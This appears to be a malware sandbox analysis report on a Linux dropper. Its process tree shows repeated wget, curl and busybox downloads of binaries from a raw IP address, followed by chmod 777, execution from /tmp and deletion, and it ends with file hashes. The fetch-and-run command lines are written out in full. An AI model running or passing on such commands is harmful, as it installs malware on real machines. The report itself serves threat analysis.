/usr/bin/wgetwget http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:870
-
-
/bin/chmodchmod 777 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI./lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:876
-
-
/bin/chmodchmod 777 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH./MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:882
-
-
/bin/chmodchmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:888
-
-
/bin/chmodchmod 777 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F./LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:896
-
-
/bin/chmodchmod 777 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6./rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:902
-
-
/bin/chmodchmod 777 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt./LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:908
-
-
/bin/chmodchmod 777 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL./PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:912
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97